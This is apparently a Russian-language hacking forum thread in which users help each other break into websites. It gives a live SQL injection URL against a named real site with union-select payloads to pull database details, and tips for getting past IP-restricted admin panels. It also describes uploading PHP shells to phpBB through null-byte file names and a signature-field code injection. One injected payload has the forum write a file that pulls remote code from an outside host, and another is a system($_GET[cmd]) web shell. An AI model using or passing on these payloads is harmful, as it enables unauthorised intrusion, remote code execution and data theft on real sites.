Самым прямым способом - через шелл например которого как я понял у тебя нету или ftp доступ которого по всей видимости у тебя тоже нету так что на этот можешь даже и не расчитывать.
MurZeg Если доступ в админку закрыт по IP то никак ты туда не попадёшь, кроме как с разрешённых айпишников. -m0rgan- Как всегда в своём репертуаре. Мне интересно, ты сам как думаешь, если бы у него был доступ на запись .htaccess нахрена ему было-бы задавать тут эти вопросы и вообще ломиться в админку?
2jokester Иему нужен доступ в админку, на вход в акминку стоин ограничение по ипу по определённому диамозону, ИМХО. Он нашол баг и получил пароли, но в админку зайти не может. Ну почему бы ему не заюзать данный баг для получения доступа к .htaccess ? Меня не посвещали, для чего ему нужен доступ в админ панель. Возможно я ошибаюсь, но это моё личное мнение...
2MurZeg, попробуй поискать прокси, который подходит по данному диапазону (если ты его знаешь) - уже выручал такое =) А вообще, можешь тупо попробовать данный пасс к ФТП\ССХ и прочим... ==== Ещё кстати вариант, тож встречался. Когда в Файле htaccess стоит ограницение по ИП только к Одному файлу, к примеру /admin/index.php, а ты попробуй прописать, к примеру /admin/admin.php и есть вероятность, что проканает (это в случае если ещё и админка так реализована)
http://tinakandelaki.ru/index.php?page=press&id=-1+union+select+1,2,3,4,5-- При выявлении database() ниче не выскакивает (отчет о ошибках выключен я так пологаю) что делать?
unhex(hex(concat_ws(0x3a,))) http://tinakandelaki.ru/index.php?page=press&id=-1+union+select+1,unhex(hex(concat_ws(0x3a,database()))),3,4,5--+
concat_ws(0x3a в данном случае не нужен, используется только для вывода НЕСКОЛЬКИХ данных подряд, userass:mail например если только один параметр надо выцепить - то просто лишний оператор, иногда имеет значение при ограничении длины запроса
Pashkela, я не думаю, что он этого незнал, так, для удобства написал, чтобы потом можнобыло не только датабэйс выводить
вообще использование concat_ws более надёжно, функция concat если ей будет передано значение равное NULL вернёт 0, а не то что хотелось бы) поэтому старайтесь юзать with separator, дабы избежать лишних проблем
Кто знает актуал методы залития шелла в phpbb? Импорт БД не канает, в гугле искал - ничего нормального
mailbrush вот! хочу спросить про метод с аватаркой Поподробней расскажи своими словами как его юзать Эксплоит от шанкара не канает почему то При импорте БД пишет SQL Error : 1045 Access denied for user '***'@'%' (using password: YES)
Ничего удивительного нет, прав у текущего юзера не хватает на выборку из БД... Метод древний как сам мир... на линк почитай, там всё описанно, можно кстати не только через аватарку, как вариант ещё и атачем...
DrAssault не знаю правильно я сделал, кароче сделал файл xz.jpg в нем php скрипт который записывает в опр. файл кое-что, при загрузке пишет пробывал по разному: xz.jpg%00.php xz.php%00.jpg
laedafess ок фенкс. 4 способ действительно проканал. (высвечиваеться phpinfo) но я чет не догоняю как залить с помощью этого шелл Вот код который импортирую UPDATE phpbb_users SET user_sig_bbcode_uid='(.+)/e\0', user_sig='phpbb: $file= fopen(`shell.php`,`w`); fwrite($file, `<? @include("http://diznt.narod.ru/info2.txt"); ?>`); fclose($file);' WHERE user_id=2; Получаеться в подписи сам код! phpbb $file= fopen(`shell.php`,`w`); fwrite($file, `<? @include("http fclose($file); При этом сам файл shell.php не создаеться!
импортируешь код: UPDATE phpbb_users SET user_sig_bbcode_uid='(.+)/e\0', user_sig='phpbb:system($_GET[cmd])' WHERE user_id=2; потом site.com/phpBB2/profile.php?mode=editprofile&cmd=ls -lia ну как то так) и льешь шелл. Через wget, curl или fetch..
